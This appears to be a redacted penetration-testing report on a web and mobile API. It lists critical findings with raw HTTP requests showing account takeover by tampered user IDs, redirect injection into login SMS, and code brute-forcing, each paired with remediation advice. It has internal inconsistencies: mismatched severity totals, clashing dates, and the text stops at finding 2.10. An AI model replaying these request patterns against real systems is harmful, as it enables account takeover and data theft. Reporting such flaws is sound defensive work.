Penetration Testing

ReportMars 14 , 2022 th

Prepared by:

Email:

Telephone: xxxxxxxx
Table of Contents

Executive Summary.....................................................................................................................4
Assessment Summary............................................................................................................................... 4
Strategic Recommendations..................................................................................................................... 4
1 Technical Summary..............................................................................................................5
1.1 Scope............................................................................................................................................. 5
1.2 Post Assessment Clean-up............................................................................................................. 5
1.3 Risk Ratings.................................................................................................................................... 5
1.4 Findings Overview.......................................................................................................................... 6
2 Technical Details...................................................................................................................7
2.1 User Impersonation - Improper Access Control.............................................................................7
2.2 Data Exfiltration – Improper Access Control..................................................................................8
2.3 Privilege escalation........................................................................................................................ 9
2.4 Unvalidated Redirect................................................................................................................... 10
2.5 Exposure of Data to an Unauthorized Control Sphere.................................................................11
2.6 URL Redirection to Untrusted Site (‘Open Redirect’)...................................................................12
2.7 Cross-Site Request Forgery (CSRF)............................................................................................... 13
2.8 Unrestricted Upload of File with Dangerous Type.......................................................................14
2.9 Security Misconfiguration – Replay Attack................................................................................... 15
2.10 Missing Brute Force Protection.................................................................................................... 16
2.11 Missing ‘Strict-Transport-Security’ header................................................................................... 17
2.12 Overlay Permissive Cross-domain Whitelist................................................................................. 18
2.13 Missing Error Handling Leads to Information Exposure...............................................................19
2.14 Frameable response (Clickjacking)............................................................................................... 20
Document Control
Client Confidentiality

This document contains Client Confidential information and may not be copied without written permission.

Proprietary Information

The content of this document is considered proprietary information and should not be disclosed outside of the
recipient organization’s network.

PenTest-Hub gives permission to copy this report for the purposes of disseminating information within your
organization or any regulatory agency.

Document Version Control

Issue No. Issue Date Issued By Change Description

0.1 18/01/2018 Draft for internal review only
1.0 23/01/2018 Released to client

Executive Summary
This current report details the scope of testing conducted and all significant findings along with detailed
remedial advice. The summary below provides non-technical audience with a summary of the key findings and
section two of this report relates the key findings and contains technical details of each vulnerability that was
discovered during the assessment along with tailored best practices to fix.

Assessment Summary
Based on the security assessment for web applications the current status of the identified vulnerabilities
set the risk at a CRITICAL level, which if not addressed in time (strongly recommended before going in a live
production environment), these vulnerabilities could be a trigger for a cybersecurity breach. These vulnerabilities
can be easily fixed by following the best practices and recommendation given throughout the report.

The following table represents the penetration testing in-scope items and breaks down the issues, which were
identified and classified by severity of risk. (note that this summary table does not include the informational
items):

Phase Description Critical High Medium Low Total

1 Web/API Penetration Testing 4 5 4 1 14

Total 3 5 5 1 14

The graphs below represent a summary of the total number of vulnerabilities found up until issuing this current
report:

4
Vulnerabilities 5
4
1
0 1 2 3 4 5 6

Critical High Medium Low

Strategic Recommendations
We recommend addressing the CRITICAL and HIGH vulnerabilities before go-live.
1 Technical Summary
1.1 Scope
The security assessment was carried out in the pre-production environment and it included the following scope:

o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]

1.2 Post Assessment Clean-up

Any test accounts, which were created for the purpose of this assessment, should be disabled or removed, as
appropriate, together with any associated content.

1.3 Risk Ratings

The table below gives a key to the risk naming and colours used throughout this report to provide a clear and
concise risk scoring system.

It should be noted that quantifying the overall business risk posed by any of the issues found in any test is
outside our scope. This means that some risks may be reported as high from a technical perspective but may,
as a result of other controls unknown to us, be considered acceptable by the business.

# Risk Rating CVSSv3 Score Description

A vulnerability was discovered that has been rated as
1 CRITICAL 9.0 - 10
critical. This requires resolution as quickly as possible.
A vulnerability was discovered that has been rated as high.
2 HIGH 7.0 – 8.9
This requires resolution in a short term.
A vulnerability was discovered that has been rated as
3 MEDIUM 4.0 – 6.9 medium. This should be resolved throughout the ongoing
maintenance process.
A vulnerability was discovered that has been rated as low.
4 LOW 1.0 – 3.9 This should be addressed as part of routine maintenance
tasks.
A discovery was made that is reported for information. This
5 INFO 0 – 0.9
should be addressed in order to meet leading practice.
1.4 Findings Overview
All the issues identified during the assessment are listed below with a brief description and risk rating for each
issue. The risk ratings used in this report are defined in Risk Ratings Section.

Ref Description Risk

######-1-1 User Impersonation - Improper Access Control CRITICAL

######-1-2 Data exfiltration - Improper Access Control CRITICAL

######-1-3 Privilege escalation CRITICAL

######-1-4 Unvalidated Redirect CRITICAL

######-1-5 Exposure of Data to an Unauthorized Control Sphere HIGH

######-1-6 URL Redirection to Untrusted Site ('Open Redirect’) HIGH

######-1-7 Cross-Site Request Forgery (CSRF) HIGH

######-1-8 Unrestricted Upload of File with Dangerous Type HIGH

######-1-9 Security Misconfiguration – Replay Attack HIGH

######-1-10 Missing Brute Force Protection MEDIUM

######-1-11 Missing 'Strict-Transport-Security' header MEDIUM

######-1-12 Overly Permissive Cross-domain Whitelist MEDIUM

######-1-13 Missing Error Handling Leads to Information Exposure MEDIUM

######-1-14 Frameable response (Clickjacking) LOW

2 Technical Details
2.1 User Impersonation - Improper Access Control CRITICAL
Ref ID: -1-1

It has been discovered that through a specially crafted request a malicious user can reserve a in the name
of any other user present in the system. This is potentially dangerous because of the possible legal implication
when a genuine user is targeted to be framed for fraudulent usage of the account.

Vulnerability Details:
Affects: https://
Parameter(s) userId
Attack Vectors Authorization bearer, all post parameters
References: https://cwe.mitre.org/data/definitions/284.html

Evidence

POST /apps/v1/local-exchange-processes HTTP/1.1

Host:
Accept: application/json, text/plain, */*
content-type: application/json
Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IjUyRDJCOEIwMTJFM0I1NTM0RkU4MEI4OEM4OU
Connection: close
{
"intendedExternalReceiverFirstName": " r",
"intendedExternalReceiverLastName": " ",
"intendedExternalRecieverEmail": " ",
}

Evidence:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=

Connection: close

{"compartmentId":" ”}

A successful attack would consist in the following:

1. A malicious user creates an account.
2. Alters the above highlighted POST data.
3. Submits the request using a valid Bearer.

Remediation Guidance:

Validate all accessible inputs and protect such assets through the implemented authorization system.
 2.2 Data Exfiltration – Improper Access Control CRITICAL
Ref ID: -1-2

Our engineers have discovered that a valid can be retrieved for any of the users present in the system
without any restrictions. Once this is obtained, an attacker can generate the QR code and open
of any user from the system.

Vulnerability Details:
Affects: https://
Parameter(s) userId
Attack Vectors userId from any user from the system (this can be obtained using the search
functionality)
References: https://cwe.mitre.org/data/definitions/284.html

Evidence
Raw HTTP request used to retrieve the page.
POST /api/users/3E38C1DB-1C19-4631-8A76-48A1719A0EE0/personalcode
HTTP/1.1 Host: #
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate content-type: application/json
Content-Length: 243
Connection: close

{}

Raw HTTP response used as the page basis.

HTTP/1.1 200 OK
Content-Length: 461
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=

Connection: close

A successful attack would consist in the following:

1. A malicious user creates an account.
2. Retrieves user identifier of any user (the system easily allows this through user search functionality)
3. Within the above example request the attacker swaps the original uid with the uid of the targeted user.
4. Deletes the authorization bearer token and issues the altered request.

Remediation Guidance:

Validate all accessible inputs and protect such assets through the implemented authorization system.
 2.3 Privilege escalation CRITICAL
Ref ID: -1-3

Our engineers have discovered that altering the “id, email or phone” values, leads to privilege escalation. A
malicious user can easily create an account, make use of a valid PUT payload data but with an altered payload
in the body section. Once these values are updated, the attacker just has to use the updated phone number
within the login screen in order to successfully access the victim’s account.

Vulnerability Details:

Affects: https://
Parameter(s) Id, email, phone
Attack Vectors Values of another user
References: https://cwe.mitre.org/data/definitions/284.html

Evidence
Raw HTTP request used to retrieve the page.:
PUT /api/users/3E38C1DB-1C19-4631-8A76-48A1719A0EE0 HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkRCN3UtSkRLbjRqcW5falZ2YzBGTlotaHl0cyIsIm
Connection: close
{
"id": "ADED9C73-70E1-451C-A605-B4DDBC3C3D2B",
"firstName": " ",
"lastName": "L ",
"email": " ",
"phone": " ",
"gender": "Male",
"birthDate": "1983-12-01",
"language": "en-us"
}

Raw HTTP response used as the page basis.

HTTP/1.1 200 OK
Content-Length: 461
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=

Connection: close

{"email":" ","avatar":null,"birthDate":"1983-12-01","gender":"Male","language":"en-
us","isRegistrationCompleted":true,"isPrivacyStatementApproved":true,"key":"04A132D8-058E-4E0C-9A8A-
A74BB6CDC048","boxActionCount":0,"tagKey":null,"passUri":"api/passbook/v1/passes /61a2460
3-561c-4ca8-bea9-eff0808ad10","id":"ADED9C73-70E1-451C-A605-
B4DDBC3C3D2B","firstName":" i","lastName":" ","phone":" "}
Remediation Guidance:

Validate all accessible inputs, ensure user role matrix is protected throughout all functionalities.
 2.4 Unvalidated Redirect CRITICAL
Ref ID: -1-3

Due to unvalidated redirect, a malicious user can craft a payload so that it sends the login request message to a
valid/targeted user which then can be redirected to a malicious domain where these request (with the URL
payload) are logged and with this the attacker can gain access to the targeted user’s account. The below
example shows how a malicious domain can be injected to the SMS which is sent to the user.

Vulnerability Details:
Affects: https://
References: https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Unvalidated_Re
directs_and_Forwards_Cheat_Sheet.md

Request.:

POST /login/sms HTTP/1.1

Content-Type: application/json; charset=UTF-8
Content-Length: 94
Host:
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0

{"onMobilePlatform":true,"phone":" 8","redirectUrl":"https://pentest-hub.com/"}

Evidence:

Remediation Guidance:

All input should be correctly validated and redirects should be carefully treated.
 2.5 Exposure of Data to an Unauthorized Control Sphere HIGH
Ref ID: -1-4

While updating the user’s profile we discovered an exposed path within the user’s profile response body.

Vulnerability Details:
Affects: /api/passbook/v1/passes/ /1
Parameter(s) passUri
Attack Vectors Accessing the exposed passUri
References: https://cwe.mitre.org/data/definitions/497.html

Evidence

Raw HTTP response.

HTTP/1.1 200 OK
Content-Length: 453
Content-Type: application/json; charset=utf-8
Set-Cookie: ARRAffinity=59a86da1609d266452159b8b78ea71406bf8c6b71d5a956fc8a8ec97f56363e6;Path=/;HttpOnly
Connection: close

{"email":"[email protected]"api/passbook/v1/passes/ /61a24603-561c-4ca8-bea9-
eff0808ad104","id":"ADED9C73-70E1-451C-A605-
B4DDBC3C3D2B","firstName":" i","lastName":" ","phone":" "}

Step 2 of exploitation:

Using the passUri value in a new request:

Raw HTTP request

GET /api/passbook/v1/passes/ /1 HTTP/1.1
Accept: application/json, text/plain, */*
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkRCN3UtSk
Connection: close

Raw HTTP response.

HTTP/1.1 500 Internal Server Error
Content-Length: 134
Set-Cookie: ARRAffinity=59a86da1609d266452159b8b78ea71406bf8c6b71d5a956fc8a8ec97f56363e6;Path=/;HttpOnly Connection: close

{"message":"Certificate for Apple iOS passbook: D:\\home\\site\\wwwroot\\Certificates\\ PassCertificate.p12"}

NOTE: This error exposed an interesting information. It is understood that the test environment was not
properly configured to fully use all assets, so, to validate this vulnerability, the next step was to replay the same
request but changing the host to production. The result fully exposed the p12 certificate.

Remediation Guidance:
1. Create custom error messages that don’t expose sensitive information.
2. Make sure there are no sensitive files exposed through the presentation layer.
 2.6 URL Redirection to Untrusted Site (‘Open Redirect’) HIGH
Ref ID: -1-5

URL redirectors represent common functionality employed by web sites to forward an incoming request to an
alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved
within the directory structure and to avoid breaking functionality for users that request the resource at its
previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs
or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in
the example below.

Vulnerability Details:
Affects: https:// ?SPHostUrl=https://
Parameter(s) SPHostUrl
Attack Vectors https://www.pentest-hub.com
References: http://projects.webappsec.org/URL-Redirector-Abuse

Evidence
GET / / ?=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttps%2Fwww.pentest-
hub.com?ProductNumber=16.0.6823.1206&UserID=i%3A0%2A.f%7Cmembership%7Csl% ?&selectedItemID=%7C3&sel
ectedListID=%7B919D5894-A969-4A55-9A81-7C27D69D49DF%7D HTTP/1.1

Host:

Accept-Encoding: gzip, deflate

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6

Raw HTTP response.

HTTP/1.1 307 Temporary Redirect

Location: https://www.pentest- hub.com/?https://

/sites
/context%3fcontextKey%3d08ec9fd1-a5d0-45af-9633-a86779734549

NOTE: The above URL is only an example which shows the discovered vulnerability. The vulnerability is actually
present in multiple areas of the application. To fully remediate the vulnerable parameter, consider applying the
proposed fix to all instanced where the parameter is present.

Remediation Guidance:
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of
acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to
specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or
malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential
attacks or determining which inputs are so malformed that they should be rejected outright.
 2.7 Cross-Site Request Forgery (CSRF) HIGH
Ref ID: -1-6

The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request
was intentionally provided by the user who submitted the request.

When a web server is designed to receive a request from a client without any mechanism for verifying that it
was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional
request to the web server which will be treated as an authentic request. This can be done via a URL, image
load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

Vulnerability Details:
Affects: https://
Parameter(s) Missing or incomplete implementation of CSRF protection (token)
Attack Vectors CSRF related
References: https://cwe.mitre.org/data/definitions/284.html

Evidence

The result of a successful exploit is that a new topic is inserted and present within the dashboard. See below:

NOTE: The above is only an example which shows the discovered vulnerability. The vulnerability is actually
present in multiple areas of the application.

Remediation Guidance:

Based on the risk of whether the form submission performs a sensitive action, the addition of anti-CSRF tokens
may be required.

These tokens can be configured in such a way that each session generates a new anti-CSRF token or such that
each individual request requires a new token.
 2.8 Unrestricted Upload of File with Dangerous Type HIGH
Ref ID: -1-7

The software allows the attacker to upload or transfer files of dangerous types that can be automatically
processed within the product's environment.

Vulnerability Details:
Affects: https://
Parameter(s) Upload functionality
Attack Vectors Malicious file upload
https://www.owasp.org/index.php/Unrestricted_File_Upload
References:
https://cwe.mitre.org/data/definitions/434.html

Evidence

In order to reproduce the vulnerability, wherever the upload functionality is implemented try uploading “out-
of- context” files or even files that contain malicious payloads (malware).

In the example shown below, we have successfully uploaded a malware that is embedded into a PDF file. For
further testing/validation purposes we will share the same file as part of this report (it contains a harmless
dummy malware payload that is used only to discover such vulnerabilities).

Remediation Guidance:

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist
is likely to miss at least one undesirable input, especially if the code's environment changes. This can give
attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting
potential attacks or determining which inputs are so malformed that they should be rejected outright.
 2.9 Security Misconfiguration – Replay Attack HIGH
Ref ID: -1-8

Due to the “replay attack” vulnerability, a malicious user can iterate the access code using the auto-generated
string brute force method to gain access to a user’s account.

Vulnerability Details:

Affects: https:// /connect/token

Parameter(s) code
Attack Vectors Randomly generated
References: https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration

Evidence
Raw HTTP request used to retrieve the page.
POST /ids/connect/token HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https:// .com/authentication/register/account-
verify;emailOrPhone=
Origin: https:// .com
Connection: close

client_id=wap&client_secret=no_secret&grant_type=custom&scope=email%20offline_access%20openid%20profile%20roles%20api.ge
neral&code=287316

Raw HTTP response.

HTTP/1.1 200 OK

Remediation Guidance:
Within any of the app’s functionality, the requests should be protected in such way that replay attacks are not
possible. The solution for this would be the usage of a unique token for every request.
 2.10 Missing Brute Force Protection MEDIUM
Ref ID: -1-9

Our tests have discovered that the software does not implement sufficient measures to prevent multiple failed
authentication attempts within in a short time frame, making it more susceptible to brute force attacks. This
was discovered within the upload functionality accessible through the invite that can be shared through
email.

The risk rating in this particular case is medium as the functionality only serves for uploading and the
invite link is random enough to be considered as secure. However, the risk is still present as the invite link does
not have an expiration time set and it is transported through the URL which in some cases can be easily picked
up and it is also saved in browser history, analytics systems and other.

Vulnerability Details:
Affects: https:// /
https://cwe.mitre.org/data/definitions/307.html
References:
https://www.owasp.org/index.php/Blocking_Brute_Force_Attacks

Evidence

Remediation Guidance:
We recommend implementing a CAPTCHA system to limit the risk carried by possible brute force attacks
against the platform.